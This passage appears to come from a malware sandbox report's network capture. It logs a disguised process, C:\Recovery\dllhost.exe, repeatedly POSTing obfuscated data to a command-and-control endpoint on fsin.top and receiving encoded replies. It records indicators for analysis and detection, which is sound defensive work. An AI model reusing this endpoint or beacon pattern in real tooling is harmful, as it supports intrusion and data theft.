                                                  Date: Thu, 01 Aug 2024 05:38:38 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rkAec9bAGbOX3UApwVlSGjV3Snfn7y8pXHnBVOd1KHkGU8JdDI53Z2Ty1WqyrZynOoeNoN5OJd3aWIOGGQbPrreCScWDwEfWgLqxnYWRSD1oQr996VjmmOTJBQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8ac37bac3ec319f7-EWR
                                                  alt-svc: h2=":443"; ma=60
                                                  Data Raw: 34 0d 0a 30 57 5b 59 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: 40W[Y0


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  100192.168.2.449837172.67.203.2807288C:\Recovery\dllhost.exe
                                                  TimestampBytes transferredDirectionData
                                                  Aug 1, 2024 07:38:38.531377077 CEST274OUTPOST /javascriptCentraldownloads.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                  Host: fsin.top
                                                  Content-Length: 1012
                                                  Expect: 100-continue
                                                  Connection: Keep-Alive
                                                  Aug 1, 2024 07:38:38.881041050 CEST1012OUTData Raw: 54 51 58 50 5f 5a 5d 51 5c 5e 5a 51 54 5f 57 5a 57 50 5e 59 56 59 51 58 5b 5d 5f 5a 5b 59 5b 55 5c 5d 5e 5c 5a 5e 51 51 5b 53 51 5c 54 51 5e 56 52 5d 5c 57 58 56 58 59 57 58 54 5d 59 59 5c 58 5b 53 5a 58 5f 56 57 50 59 5c 42 5b 43 53 43 5c 55 53
                                                  Data Ascii: TQXP_Z]Q\^ZQT_WZWP^YVYQX[]_Z[Y[U\]^\Z^QQ[SQ\TQ^VR]\WXVXYWXT]YY\X[SZX_VWPY\B[CSC\USUWV^]_VQ_Z[VPT[_X]P^BQ_U_T^P]_]\^_QYTQTCX]P^X]TP]US[[YG][X_^XXV\T@^TZE\[GSY]^QDY\][XQ\V[PXZ^P[^ZUSZS^S"'26=+&%](+R=%:1;(1^$ ,W8?682%&G#.X!
                                                  Aug 1, 2024 07:38:38.984688044 CEST25INHTTP/1.1 100 Continue
                                                  Aug 1, 2024 07:38:39.217135906 CEST586INHTTP/1.1 200 OK
                                                  Date: Thu, 01 Aug 2024 05:38:39 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jnBTm5LZ9RFY0JTP7z5aiv4WvWouCO6tkAXeJ6R6x6HsFmQiGdYGuurluRkTixHNeC45eKljZdbFiB7xRcr%2BzFLOvbM5f81Ogo%2F%2FHLHaIZu%2FKuaSeraZb8q7lA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8ac37bb15dbd43ff-EWR
                                                  alt-svc: h2=":443"; ma=60
                                                  Data Raw: 34 0d 0a 30 57 5b 59 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: 40W[Y0


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  101192.168.2.449838172.67.203.2807288C:\Recovery\dllhost.exe
                                                  TimestampBytes transferredDirectionData
                                                  Aug 1, 2024 07:38:39.352999926 CEST274OUTPOST /javascriptCentraldownloads.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                  Host: fsin.top
                                                  Content-Length: 1012
                                                  Expect: 100-continue
                                                  Connection: Keep-Alive
                                                  Aug 1, 2024 07:38:39.709064960 CEST1012OUTData Raw: 54 51 58 52 5a 5d 58 57 5c 5e 5a 51 54 54 57 55 57 5f 5e 5c 56 5a 51 5a 5b 5d 5f 5a 5b 59 5b 55 5c 5d 5e 5c 5a 5e 51 51 5b 53 51 5c 54 51 5e 56 52 5d 5c 57 58 56 58 59 57 58 54 5d 59 59 5c 58 5b 53 5a 58 5f 56 57 50 59 5c 42 5b 43 53 43 5c 55 53
                                                  Data Ascii: TQXRZ]XW\^ZQTTWUW_^\VZQZ[]_Z[Y[U\]^\Z^QQ[SQ\TQ^VR]\WXVXYWXT]YY\X[SZX_VWPY\B[CSC\USUWV^]_VQ_Z[VPT[_X]P^BQ_U_T^P]_]\^_QYTQTCX]P^X]TP]US[[YG][X_^XXV\T@^TZE\[GSY]^QDY\][XQ\V[PXZ^P[^ZUSZS^S!$>!0+5>5& &/2/,.3!8,2&G#.X!,
                                                  Aug 1, 2024 07:38:39.819072008 CEST25INHTTP/1.1 100 Continue
                                                  Aug 1, 2024 07:38:39.970844030 CEST582INHTTP/1.1 200 OK
                                                  Date: Thu, 01 Aug 2024 05:38:39 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=i4CLG0pONRbrIqTW043RPh5rxvk5dxIDUcdj5rskszNFt8j52rC0v0iBV9ohqMEY1L8GKpkjGcHLJh%2FL7Dril4cRwQrELYiBXTY4nk1RwMagm6wjxjD9S%2BzVmA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8ac37bb698e2438b-EWR
                                                  alt-svc: h2=":443"; ma=60
                                                  Data Raw: 34 0d 0a 30 57 5b 59 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: 40W[Y0


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  102192.168.2.449839172.67.203.2807288C:\Recovery\dllhost.exe
                                                  TimestampBytes transferredDirectionData
                                                  Aug 1, 2024 07:38:40.077512980 CEST274OUTPOST /javascriptCentraldownloads.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                  Host: fsin.top
                                                  Content-Length: 1264
                                                  Expect: 100-continue
                                                  Connection: Keep-Alive


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  103192.168.2.449840172.67.203.2807288C:\Recovery\dllhost.exe
                                                  TimestampBytes transferredDirectionData
                                                  Aug 1, 2024 07:38:40.106586933 CEST274OUTPOST /javascriptCentraldownloads.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                  Host: fsin.top
                                                  Content-Length: 1012
                                                  Expect: 100-continue
                                                  Connection: Keep-Alive
                                                  Aug 1, 2024 07:38:40.459127903 CEST1012OUTData Raw: 54 55 58 53 5f 5a 58 52 5c 5e 5a 51 54 54 57 56 57 54 5e 5d 56 5d 51 5c 5b 5d 5f 5a 5b 59 5b 55 5c 5d 5e 5c 5a 5e 51 51 5b 53 51 5c 54 51 5e 56 52 5d 5c 57 58 56 58 59 57 58 54 5d 59 59 5c 58 5b 53 5a 58 5f 56 57 50 59 5c 42 5b 43 53 43 5c 55 53
                                                  Data Ascii: TUXS_ZXR\^ZQTTWVWT^]V]Q\[]_Z[Y[U\]^\Z^QQ[SQ\TQ^VR]\WXVXYWXT]YY\X[SZX_VWPY\B[CSC\USUWV^]_VQ_Z[VPT[_X]P^BQ_U_T^P]_]\^_QYTQTCX]P^X]TP]US[[YG][X_^XXV\T@^TZE\[GSY]^QDY\][XQ\V[PXZ^P[^ZUSZS^S"3"!-03(2T)-%8%-1+/=3!_15&G#.X!,
                                                  Aug 1, 2024 07:38:40.579710960 CEST25INHTTP/1.1 100 Continue
                                                  Aug 1, 2024 07:38:40.828578949 CEST584INHTTP/1.1 200 OK
                                                  Date: Thu, 01 Aug 2024 05:38:40 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KigAdjpSot1u%2F00B%2FUSIlEfLsQBY7pozVrfbroozhIzznVtnYpw1Ex2V%2FlhGGWJoJPVARMaB5YDeFVmHdOVLnQjw7Z4olbKs5XwsvMeGELKafbM9xblqwhV0lQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8ac37bbb4a510cd9-EWR
                                                  alt-svc: h2=":443"; ma=60
                                                  Data Raw: 34 0d 0a 30 57 5b 59 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: 40W[Y0


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  104192.168.2.449841172.67.203.2807288C:\Recovery\dllhost.exe
                                                  TimestampBytes transferredDirectionData
                                                  Aug 1, 2024 07:38:40.986021042 CEST250OUTPOST /javascriptCentraldownloads.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                  Host: fsin.top
                                                  Content-Length: 1012
                                                  Expect: 100-continue
                                                  Aug 1, 2024 07:38:41.334069014 CEST1012OUTData Raw: 51 55 58 55 5f 5e 58 56 5c 5e 5a 51 54 51 57 54 57 5f 5e 56 56 59 51 5e 5b 5d 5f 5a 5b 59 5b 55 5c 5d 5e 5c 5a 5e 51 51 5b 53 51 5c 54 51 5e 56 52 5d 5c 57 58 56 58 59 57 58 54 5d 59 59 5c 58 5b 53 5a 58 5f 56 57 50 59 5c 42 5b 43 53 43 5c 55 53
                                                  Data Ascii: QUXU_^XV\^ZQTQWTW_^VVYQ^[]_Z[Y[U\]^\Z^QQ[SQ\TQ^VR]\WXVXYWXT]YY\X[SZX_VWPY\B[CSC\USUWV^]_VQ_Z[VPT[_X]P^BQ_U_T^P]_]\^_QYTQTCX]P^X]TP]US[[YG][X_^XXV\T@^TZE\[GSY]^QDY\][XQ\V[PXZ^P[^ZUSZS^S"[01:!-+$%3X<*R=]28'1[107/>'5&5&G#.X!
                                                  Aug 1, 2024 07:38:41.448802948 CEST25INHTTP/1.1 100 Continue
                                                  Aug 1, 2024 07:38:41.698100090 CEST594INHTTP/1.1 200 OK
                                                  Date: Thu, 01 Aug 2024 05:38:41 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5a%2F2qQ0M1O7u%2Bqnaq7B6cFEIm9gt%2BUVDr232WPjypVAQXPPH0mFOn0tKlSq0UggPDna2MZbgCZ%2BRqqGQVNPwpNU%2BtGDz0ctxZo9xSqHfKc8MKChYg%2F%2BU48%2Fk6g%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8ac37bc0cef94369-EWR
                                                  alt-svc: h2=":443"; ma=60
                                                  Data Raw: 34 0d 0a 30 57 5b 59 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: 40W[Y0


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  105192.168.2.449842172.67.203.2807288C:\Recovery\dllhost.exe
                                                  TimestampBytes transferredDirectionData
                                                  Aug 1, 2024 07:38:41.828728914 CEST274OUTPOST /javascriptCentraldownloads.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                  Host: fsin.top
                                                  Content-Length: 1012
                                                  Expect: 100-continue
                                                  Connection: Keep-Alive
                                                  Aug 1, 2024 07:38:42.177973986 CEST1012OUTData Raw: 54 57 58 50 5f 5a 58 54 5c 5e 5a 51 54 55 57 56 57 5e 5e 5c 56 5e 51 5b 5b 5d 5f 5a 5b 59 5b 55 5c 5d 5e 5c 5a 5e 51 51 5b 53 51 5c 54 51 5e 56 52 5d 5c 57 58 56 58 59 57 58 54 5d 59 59 5c 58 5b 53 5a 58 5f 56 57 50 59 5c 42 5b 43 53 43 5c 55 53
                                                  Data Ascii: TWXP_ZXT\^ZQTUWVW^^\V^Q[[]_Z[Y[U\]^\Z^QQ[SQ\TQ^VR]\WXVXYWXT]YY\X[SZX_VWPY\B[CSC\USUWV^]_VQ_Z[VPT[_X]P^BQ_U_T^P]_]\^_QYTQTCX]P^X]TP]US[[YG][X_^XXV\T@^TZE\[GSY]^QDY\][XQ\V[PXZ^P[^ZUSZS^S"%2Z!,$ )+!?5.\2(+V',.[%#8.05 &%&G#.X!(
                                                  Aug 1, 2024 07:38:42.285811901 CEST25INHTTP/1.1 100 Continue
                                                  Aug 1, 2024 07:38:42.436835051 CEST586INHTTP/1.1 200 OK
                                                  Date: Thu, 01 Aug 2024 05:38:42 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mouHYBJi%2F%2Fk2Bb9HiAtSLt21zbjwWjX66LR7E8Bar%2BDeX%2FtnwPfUooH65j0GmQNvnBIHcpU1FVnc8KzRNXDdGF3kLT7p859vJVcppAGy0hznD92PdqCYcXBIIg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8ac37bc5fee3435d-EWR
                                                  alt-svc: h2=":443"; ma=60
                                                  Data Raw: 34 0d 0a 30 57 5b 59 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: 40W[Y0


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  106192.168.2.449843172.67.203.2807288C:\Recovery\dllhost.exe
                                                  TimestampBytes transferredDirectionData
                                                  Aug 1, 2024 07:38:42.595539093 CEST274OUTPOST /javascriptCentraldownloads.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                  Host: fsin.top
                                                  Content-Length: 1012
                                                  Expect: 100-continue
                                                  Connection: Keep-Alive
                                                  Aug 1, 2024 07:38:42.943382025 CEST1012OUTData Raw: 51 52 58 50 5f 5d 58 5c 5c 5e 5a 51 54 51 57 53 57 50 5e 58 56 58 51 59 5b 5d 5f 5a 5b 59 5b 55 5c 5d 5e 5c 5a 5e 51 51 5b 53 51 5c 54 51 5e 56 52 5d 5c 57 58 56 58 59 57 58 54 5d 59 59 5c 58 5b 53 5a 58 5f 56 57 50 59 5c 42 5b 43 53 43 5c 55 53
                                                  Data Ascii: QRXP_]X\\^ZQTQWSWP^XVXQY[]_Z[Y[U\]^\Z^QQ[SQ\TQ^VR]\WXVXYWXT]YY\X[SZX_VWPY\B[CSC\USUWV^]_VQ_Z[VPT[_X]P^BQ_U_T^P]_]\^_QYTQTCX]P^X]TP]US[[YG][X_^XXV\T@^TZE\[GSY]^QDY\][XQ\V[PXZ^P[^ZUSZS^S"_3Z"Z$6'\<>=5&'(1?>2U(S8?X6815&G#.X!
                                                  Aug 1, 2024 07:38:43.298593998 CEST25INHTTP/1.1 100 Continue
                                                  Aug 1, 2024 07:38:43.300574064 CEST25INHTTP/1.1 100 Continue
                                                  Aug 1, 2024 07:38:43.325967073 CEST588INHTTP/1.1 200 OK
                                                  Date: Thu, 01 Aug 2024 05:38:43 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BmZcHsn88A1gfsX%2F3%2BDRD8mIdJneW9B7d2djxsO3zxgvlM%2F%2FetnVOImjydX7E80hvq26AOeOj5K0SbhJzEjawLc48fbNh7xfvgmL3eUc50uB7LV8DXGsU1cXuw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8ac37bcaea1bc35b-EWR
                                                  alt-svc: h2=":443"; ma=60
                                                  Data Raw: 34 0d 0a 30 57 5b 59 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: 40W[Y0


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  107192.168.2.449844172.67.203.2807288C:\Recovery\dllhost.exe
                                                  TimestampBytes transferredDirectionData
                                                  Aug 1, 2024 07:38:43.452290058 CEST274OUTPOST /javascriptCentraldownloads.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                  Host: fsin.top
                                                  Content-Length: 1012
                                                  Expect: 100-continue
                                                  Connection: Keep-Alive
                                                  Aug 1, 2024 07:38:43.802771091 CEST1012OUTData Raw: 51 53 58 52 5a 5c 58 56 5c 5e 5a 51 54 50 57 5b 57 53 5e 5d 56 5f 51 58 5b 5d 5f 5a 5b 59 5b 55 5c 5d 5e 5c 5a 5e 51 51 5b 53 51 5c 54 51 5e 56 52 5d 5c 57 58 56 58 59 57 58 54 5d 59 59 5c 58 5b 53 5a 58 5f 56 57 50 59 5c 42 5b 43 53 43 5c 55 53
                                                  Data Ascii: QSXRZ\XV\^ZQTPW[WS^]V_QX[]_Z[Y[U\]^\Z^QQ[SQ\TQ^VR]\WXVXYWXT]YY\X[SZX_VWPY\B[CSC\USUWV^]_VQ_Z[VPT[_X]P^BQ_U_T^P]_]\^_QYTQTCX]P^X]TP]US[[YG][X_^XXV\T@^TZE\[GSY]^QDY\][XQ\V[PXZ^P[^ZUSZS^S!'T>"7$<(*=!&;7'/)&3;=3"(&%&G#.X!<
                                                  Aug 1, 2024 07:38:43.896549940 CEST25INHTTP/1.1 100 Continue
                                                  Aug 1, 2024 07:38:44.137574911 CEST588INHTTP/1.1 200 OK
                                                  Date: Thu, 01 Aug 2024 05:38:44 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OqvGl%2FSvzJhQsBP%2FhPIadNbt07TFaw%2Bb1WFDlm6Byn8sZi%2F7lfgfyD%2FkfGoX5LjQODccNLsZHMGcjXkUWUKN4Wse7XZ90s8G7qHtwyxyAFaHDaeRyOwPfoGblA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8ac37bd0192b80da-EWR
                                                  alt-svc: h2=":443"; ma=60
                                                  Data Raw: 34 0d 0a 30 57 5b 59 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: 40W[Y0


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  108192.168.2.449845172.67.203.2807288C:\Recovery\dllhost.exe
                                                  TimestampBytes transferredDirectionData
                                                  Aug 1, 2024 07:38:44.257770061 CEST274OUTPOST /javascriptCentraldownloads.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                  Host: fsin.top
                                                  Content-Length: 1012
                                                  Expect: 100-continue
                                                  Connection: Keep-Alive
                                                  Aug 1, 2024 07:38:44.615314007 CEST1012OUTData Raw: 54 53 5d 50 5a 5a 5d 56 5c 5e 5a 51 54 50 57 5a 57 5f 5e 5b 56 5d 51 5b 5b 5d 5f 5a 5b 59 5b 55 5c 5d 5e 5c 5a 5e 51 51 5b 53 51 5c 54 51 5e 56 52 5d 5c 57 58 56 58 59 57 58 54 5d 59 59 5c 58 5b 53 5a 58 5f 56 57 50 59 5c 42 5b 43 53 43 5c 55 53
                                                  Data Ascii: TS]PZZ]V\^ZQTPWZW_^[V]Q[[]_Z[Y[U\]^\Z^QQ[SQ\TQ^VR]\WXVXYWXT]YY\X[SZX_VWPY\B[CSC\USUWV^]_VQ_Z[VPT[_X]P^BQ_U_T^P]_]\^_QYTQTCX]P^X]TP]US[[YG][X_^XXV\T@^TZE\[GSY]^QDY\][XQ\V[PXZ^P[^ZUSZS^S"Y31=6 X'0<->&5%++'?=1 //358?Y%&G#.X!<
                                                  Aug 1, 2024 07:38:44.703675032 CEST25INHTTP/1.1 100 Continue
                                                  Aug 1, 2024 07:38:44.867178917 CEST584INHTTP/1.1 200 OK
                                                  Date: Thu, 01 Aug 2024 05:38:44 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4DSO2vkxB0GN7Y6CtbTPVU8oJJKosJM5n7iHCYSLwHaypsPP3mwBnW9UMgNfxHcfQu%2BnvN55HneSrGTyGZ3zuyXAZRZUw%2FlIgmnOICBHFN06wNy23cNGr9%2FBjQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8ac37bd518ab4252-EWR
                                                  alt-svc: h2=":443"; ma=60
                                                  Data Raw: 34 0d 0a 30 57 5b 59 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: 40W[Y0


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  109192.168.2.449846172.67.203.2807288C:\Recovery\dllhost.exe
                                                  TimestampBytes transferredDirectionData
                                                  Aug 1, 2024 07:38:44.990318060 CEST274OUTPOST /javascriptCentraldownloads.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                  Host: fsin.top
                                                  Content-Length: 1012
                                                  Expect: 100-continue
                                                  Connection: Keep-Alive


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  110192.168.2.449847172.67.203.2807288C:\Recovery\dllhost.exe
                                                  TimestampBytes transferredDirectionData
                                                  Aug 1, 2024 07:38:45.114742994 CEST274OUTPOST /javascriptCentraldownloads.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                  Host: fsin.top
                                                  Content-Length: 1284
                                                  Expect: 100-continue
                                                  Connection: Keep-Alive
                                                  Aug 1, 2024 07:38:45.459062099 CEST1284OUTData Raw: 51 54 5d 52 5a 5b 5d 56 5c 5e 5a 51 54 51 57 51 57 50 5e 5b 56 5a 51 5e 5b 5d 5f 5a 5b 59 5b 55 5c 5d 5e 5c 5a 5e 51 51 5b 53 51 5c 54 51 5e 56 52 5d 5c 57 58 56 58 59 57 58 54 5d 59 59 5c 58 5b 53 5a 58 5f 56 57 50 59 5c 42 5b 43 53 43 5c 55 53
                                                  Data Ascii: QT]RZ[]V\^ZQTQWQWP^[VZQ^[]_Z[Y[U\]^\Z^QQ[SQ\TQ^VR]\WXVXYWXT]YY\X[SZX_VWPY\B[CSC\USUWV^]_VQ_Z[VPT[_X]P^BQ_U_T^P]_]\^_QYTQTCX]P^X]TP]US[[YG][X_^XXV\T@^TZE\[GSY]^QDY\][XQ\V[PXZ^P[^ZUSZS^S"'"5"35/_<.R=*Y&8&/&%#,/!8%&G#.X!
                                                  Aug 1, 2024 07:38:45.576190948 CEST25INHTTP/1.1 100 Continue
                                                  Aug 1, 2024 07:38:45.821436882 CEST733INHTTP/1.1 200 OK
                                                  Date: Thu, 01 Aug 2024 05:38:45 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=52EMzcf10dXjOIh%2Fdb%2FYa4LRk0cNej8VK6n3dWcXPyDbYjQTvrcDiyjLfcVFQT%2BUfV7gxbhi3OsxnJaSWxLk1GHyHasSSEuhX9OrfUudUI49GGqSb4RwBLarcw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8ac37bda8b218cbd-EWR
                                                  alt-svc: h2=":443"; ma=60
                                                  Data Raw: 39 38 0d 0a 02 1f 21 0d 27 2b 31 0c 36 03 23 0d 2a 1c 0f 1b 2a 1d 3f 02 2b 3a 27 59 25 3c 22 00 25 06 01 0c 20 2c 3d 58 24 3c 21 0e 25 21 36 59 3e 37 21 51 04 11 26 17 21 20 3a 1b 2a 39 30 00 27 06 3b 12 22 26 20 11 30 55 2e 09 21 3a 28 5e 3e 0b 25 1e 28 0c 27 53 2e 3b 05 59 2b 30 33 00 31 0c 2a 56 0d 17 21 09 39 38 12 50 24 54 30 51 34 12 2f 1f 21 38 3e 01 28 2c 22 5d 3e 0a 3d 00 2d 33 0a 03 28 30 32 1a 3f 04 2e 07 28 3a 3d 18 24 39 22 5d 2c 03 2d 48 0e 3d 59 4d 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: 98!'+16#**?+:'Y%<"% ,=X$<!%!6Y>7!Q&! :*90';"& 0U.!:(^>%('S.;Y+031*V!98P$T0Q4/!8>(,"]>=-3(02?.(:=$9"],-H=YM0


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  111192.168.2.449848172.67.203.2807288C:\Recovery\dllhost.exe
                                                  TimestampBytes transferredDirectionData
                                                  Aug 1, 2024 07:38:45.409106970 CEST274OUTPOST /javascriptCentraldownloads.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                  Host: fsin.top
                                                  Content-Length: 1012
                                                  Expect: 100-continue
                                                  Connection: Keep-Alive
                                                  Aug 1, 2024 07:38:45.757154942 CEST1012OUTData Raw: 54 57 5d 56 5f 5f 5d 56 5c 5e 5a 51 54 5e 57 56 57 53 5e 57 56 54 51 5f 5b 5d 5f 5a 5b 59 5b 55 5c 5d 5e 5c 5a 5e 51 51 5b 53 51 5c 54 51 5e 56 52 5d 5c 57 58 56 58 59 57 58 54 5d 59 59 5c 58 5b 53 5a 58 5f 56 57 50 59 5c 42 5b 43 53 43 5c 55 53
                                                  Data Ascii: TW]V__]V\^ZQT^WVWS^WVTQ_[]_Z[Y[U\]^\Z^QQ[SQ\TQ^VR]\WXVXYWXT]YY\X[SZX_VWPY\B[CSC\USUWV^]_VQ_Z[VPT[_X]P^BQ_U_T^P]_]\^_QYTQTCX]P^X]TP]US[[YG][X_^XXV\T@^TZE\[GSY]^QDY\][XQ\V[PXZ^P[^ZUSZS^S"0!![6-/$;+=*5]2;&=%#/$!(&5&G#.X!
                                                  Aug 1, 2024 07:38:45.873986959 CEST25INHTTP/1.1 100 Continue
                                                  Aug 1, 2024 07:38:46.107743979 CEST582INHTTP/1.1 200 OK
                                                  Date: Thu, 01 Aug 2024 05:38:46 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=z5EyXoWNnnmFQELtD2FipRxbGzgGxRhDZNlPwTAeGBBSzzwN2PlhiOl06gOYvDl2zSPniOxOT34chhVH8c4us4UXLZv%2FoMRvOHV5H2YcfMETouM%2Ba2F77bJVig%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8ac37bdc6f78431c-EWR
                                                  alt-svc: h2=":443"; ma=60
                                                  Data Raw: 34 0d 0a 30 57 5b 59 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: 40W[Y0


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  112192.168.2.449849172.67.203.2807288C:\Recovery\dllhost.exe
                                                  TimestampBytes transferredDirectionData
